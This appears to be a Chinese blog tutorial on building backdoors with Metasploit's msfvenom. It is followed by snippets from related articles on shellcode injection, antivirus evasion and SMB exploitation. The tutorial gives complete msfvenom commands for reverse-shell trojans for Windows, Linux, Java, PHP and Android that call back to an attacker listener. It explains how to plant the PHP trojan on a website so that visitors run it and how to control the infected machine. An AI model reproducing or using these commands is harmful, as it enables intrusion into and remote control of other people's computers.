MSF-Shellcode生成和使用

1      使用环境

Kali 2.0

msfvenom

2      Msfvenom参数说明

msfvenom –h    查看帮助

说明:


Options:

-p, --payload     <payload>       指定需要使用的payload(攻击荷载)。如果需要使用自定义的payload,请使用'-'或者stdin指定

-l, --list       [module_type]   列出指定模块的所有可用资源. 模块类型包括: payloads, encoders, nops, all

-n, --nopsled     <length>        为payload预先指定一个NOP滑动长度

-f, --format      <format>        指定输出格式 (使用 --help-formats 来获取msf支持的输出格式列表)

-e, --encoder    [encoder]       指定需要使用的encoder(编码器)

-a, --arch        <architecture>  指定payload的目标架构

--platform    <platform>      指定payload的目标平台

-s, --space       <length>        设定有效攻击荷载的最大长度

-b, --bad-chars   <list>          设定规避字符集,比如: '\x00\xff'

-i, --iterations <count>          指定payload的编码次数

-c, --add-code    <path>          指定一个附加的win32 shellcode文件

-x, --template    <path>          指定一个自定义的可执行文件作为模板

-k, --keep                        保护模板程序的动作,注入的payload作为一个新的进程运行

--payload-options            列举payload的标准选项

-o, --out   <path>               保存payload

-v, --var-name <name>             指定一个自定义的变量,以确定输出格式

--shellest                   最小化生成payload

-h, --help                        查看帮助选项

--help-formats               查看msf支持的输出格式列表

2.1  命常用帮助命令

msfvenom --help-formats     查看有哪些格式输出

msfvenom -l encoders       查看有哪些编码方式

3      Metasploit生成多种后门

Metasploit可以生成各种格式的后门,有php、exe(windows下后门)、linux环境下后门,java后门、androiw后门等等。

可以生成asp、aspx、php、jsp、war、exe等多种类型

现在已经没有msfpayload的命令了,换成msfvenom了。里面集成了msfpayload和msfencode

3.1  生成window下后门程序

使用以下模块生成windows系统下后门程序。

windows/meterpreter/reverse_tcp

生成木马程序时如果可以指定也可以不指定--arch x86 --platform windows,不指定则会报错提示,不用理会,-p后写指定的payload,-f后指定文件格式。

msfvenom -p windows/meterpreter/reverse_tcpLHOST=192.168.1.115 LPORT=1234 -f exe > /aaa.exe

或者指定参数如下:

使用生成木马命令:

msfvenom -p windows/meterpreter/reverse_tcp--arch x86 --platform windows LHOST=192.168.1.115 LPORT=1234 -f exe >/aaa.exe

被中木马的机器IP地址是192.168.1.123

把在kali的根目录生产的木马程序aaa.exe文件拷贝到被攻击的机器上面去192.168.1.123上。

======================================================

设置监听:

使用监听模块:use exploit/multi/handler

使用payload

执行监听

=================================================

在被攻击的机器上面双机运行aaa.exe木马,此时在kali上面观看结果如下:

说明192.168.1.123已经被中木马了,可以控制此机器了。

通过输入shell来进入控制台控制机器。

查看机器的ip地址是否是192.168.1.123

3.2  生成linux下后门程序

使用以下模块生成linux后门程序,操作方法跟windows后门使用一样。

linux/x86/shell_reverse_tcp

与windows系统唯一的区别是在linux下生成的木马需要给这个程序可执行的权限,通过使用以下命令chmod:

Chmod +x 程序名

在linux下执行木马程序命令:

./程序名

3.3  生成Java后门程序

Java程序在windows下和在linux下都可以生效执行的

使用以下模块生成后门程序:

java/meterpreter/reverse_tcp

生成木马命令:

msfvenom -p java/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /jar.jar

3.4  生成PHP后门程序

使用模块:

php/meterpreter/reverse_tcp

生成木马命令:

msfvenom -p php/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /php.php

把生成的木马php文件放到网站上面,当别人访问的时候就会执行。

3.5  生成Android后门程序

使用模块:

android/meterpreter/reverse_tcp

生成木马命令:

msfvenom -p android/meterpreter/reverse_tcplhost=192.168.1.115 lport=2222 x> /android.apk

时间: 2025-01-06 23:30:25

MSF-Shellcode生成和使用的相关文章

Donut和MSF以shellcode注入的方式执行任意文件

准备工具 MSF https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers Donut https://github.com/TheWover/donut 准备的shellcode_inject.rb代码 ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.co

msf+Donut执行程序

地址:donut:https://github.com/TheWover/donut 介绍:是一个shellcode生成工具,可以将.NET程序集等转换为shellcode. 使用:donut.exe -f (指定文件名) -a 2 (系统位数2代表64位) -o (输出文件名) msf设置参数: ps:msf若没有此博客自行添加到对应目录:https://github.com/rapid7/metasploit-framework/blob/master/modules/post/window

Window中的shellcode编写框架(入门篇)

Shellcode 定义 是一段可注入的指令(opcode),可以在被攻击的程序内运行. 特点 短小精悍,灵活多变,独立存在,无需任何文件格式的包装,因为shellcode直接操作寄存器和函数,所以opcode必须是16进制形式.因此也不能用高级语言编写shellcode.在内存中运行,无需运行在固定的宿主进程上. Shellcode的利用原理 将shellcode注入缓冲区,然后欺骗目标程序执行它.而将shellcode注入缓冲区最常用的方法是利用目标系统上的缓冲区溢出漏洞. Shellcod

复现2003方程式远程命令执行漏洞

先使用Smbtouch模块检测一下是否有漏洞. 然后使用Doublepulsar写一个shellcode到本地. 生成成功后的截图: 再使用EternalRomance植入Doublepulsar后门. 成功的截图: PS:仿佛是由于之前已经上传过bin的缘故,第二次测试的时候失败了.但是不影响后续操作. 都成功了以后该我们的Doublepulsar来反弹shell了. 我这里就不麻烦的去反弹了直接用royal大佬教我的使用msf直接生成一个添加用户的dll msfvenom -p window

Bypass AV meterpreter免杀技巧

0x01 meterpreter简介 MetasploitFramework是一个缓冲区溢出测试使用的辅助工具,也可以说是一个漏洞利用和测试平台,它集成了各种平台上常见的溢出漏洞和流行的shellcode,并且不断更新,使得缓冲区溢出测试变的方便和简单. 需要说明的是meterpreter在漏洞利用成功后会发送第二阶段的代码和meterpreter服务器dll,所以在网络不稳定的情况下经常出现没有可执行命令,或者会话建立执行help之后发现缺少命令,经常出现什么sending stager er

20145311王亦徐《网络对抗技术》后门原理与实践

20145311王亦徐<网络对抗技术>后门原理与实践 实验内容 使用netcat.socat获取主机操作Shell,并分别设置cron启动与任务计划启动 使用MSF meterpreter生成后门的可执行文件,并利用ncat或socat传送给主机,接着运行文件获取目标主机的音频.摄像头.击键记录.提权等内容 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 类似于摆渡木马的方式,将移动存储设备插入目标主机,backdoor自动拷贝到目标主机中(2)例举你知道的后门如何启动起

kali 渗透的一些笔记

kali实战笔记 17:55 2016/7/19 by: _Silvers kali系统安装后的配置及美化安装vmwareToolstar zxvf VMwareTools-sfsfsfasfasfsaf #解压安装包cd 到解压后的安装目录 ./ 绿色的可执行文件 #进行安装# 等待安装结束,期间根据提示进行y/n确定reboot # 重启kalikali系统更新及替换国内软件源leafpad /etc/apt/sources.list注释掉官方的更新源复制国内的更新源 #可百度国内更新源地址

20155302 Exp2 后门原理与实践

20155302<网络对抗>后门原理与实践 实验要求 1.使用netcat获取主机操作Shell,cron启动 (0.5分) 2.使用socat获取主机操作Shell, 任务计划启动 (0.5分) 3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分) 4.使用MSF meterpreter(或其他软件)生成获取目标主机音频.摄像头.击键记录等内容,并尝试提权 (2分) 5.可选加分内容:使用MSF生成shel

20154324 刘康权 Exp3 免杀原理与实践

一.实践目标与内容 1.实践内容 利用多种工具实现实现恶意代码免杀 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功 2.实践目标 在保证后门程序功能的情况下实现杀软共生,(即使以后不能为所欲为)也要保证自己电脑安全 二.实践过程与步骤 1.使用msf编码器生成的后门程序 也就是上次实践生成的后门程序,通过检测非常的惨,直接被国内第一杀毒软件360杀掉了,在virscan网站扫描,也有20个杀毒引擎识别了出来,裸奔的后门程序还是很容易被辨识出来的. 2.使用veil-evasion生

Exp3 免杀原理与实践20154302薛师凡

Exp3 免杀原理与实践20154302薛师凡 一.实践目标与内容 利用多种工具实现实现恶意代码免杀 在另一台电脑上,杀软开启的情况下,实现运行后门程序并回连成功. 在保证后门程序功能的情况下实现杀软共存. 二.实践过程与步骤 1.使用msf编码器生成的后门程序 上次实践生成的后门程序,直接被360发现了,在virscan网站扫描,也有17个杀毒引擎识别了出来,很容易被辨识出来的. 2.使用veil-evasion生成的后门程序 2.1安装veil平台 apt-get install veil-